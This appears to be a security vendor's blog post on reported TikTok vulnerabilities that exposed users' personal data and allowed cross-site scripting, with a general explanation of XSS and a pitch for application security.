On Jan. 8, we learned that a series of vulnerabilities in the popular social media app TikTok left the personal information of its users susceptible to exposure, potentially allowing cybercriminals to manipulate content on user accounts. The exposed data included email addresses and birthdates, which can be used in conjunction with other personally identifiable information (PII) for identity theft.
Most troubling is that the app is mainly used by teenagers and children to create short clips, mostly lip-sync videos of 3 to 15 seconds, or short looping videos of 3 to 60 seconds. The app allows its users to share or save videos of themselves and their loved ones. Sometimes, these videos contain very personal or sensitive information that users want to keep private. Now this content is at risk.
TikTok could face even greater scrutiny for this incident because this vulnerability is a clear violation of GDPR. The company was already under investigation for violating GDPR due to lack of protection for children and had been fined $5.7M in the U.S. for violating the Children’s Online Privacy Protection Act. In addition to exposing sensitive user data, there is a clear financial strain put on companies for not securing assets.
Also, the subdomain vulnerability left TikTok open to cross-site scripting attacks. Cross-site scripting (XSS) is a type of injection attack where malicious scripts are inserted into otherwise benign and trusted websites. What this means is that the attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Unfortunately, there is no way for that browser to know that the script should not be trusted and will execute the script.
Attackers can use cross-site scripting vulnerabilities to bypass access controls such as the same-origin policy. The effect of XSS attacks can range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner. These attacks succeed because flaws allow the web application to use input from a user within the output it generates, without validating or encoding it.
By contrast, cross-site request forgery exploits the trust that a website has for a user.
It’s one of the most common web vulnerabilities and can lead to phishing attacks, website defacement, session hijacking and installation of malware on a victim’s computer.
This incident emphasizes how critical it is for every company to make security a top priority and view the entire IT estate as a vulnerable asset that must be secured. This includes the protection for APIs, network connections, mobile apps, websites, databases – which can all become points of entry to a malicious actor if left unsecured.
WhiteHat Security’s goal is to make the internet safer by securing the applications that are driving today’s business, and while we are always concerned about the various ways that cybercriminals might attack, there’s so much that can be done offensively, and securing applications is a big part of the overall strategy.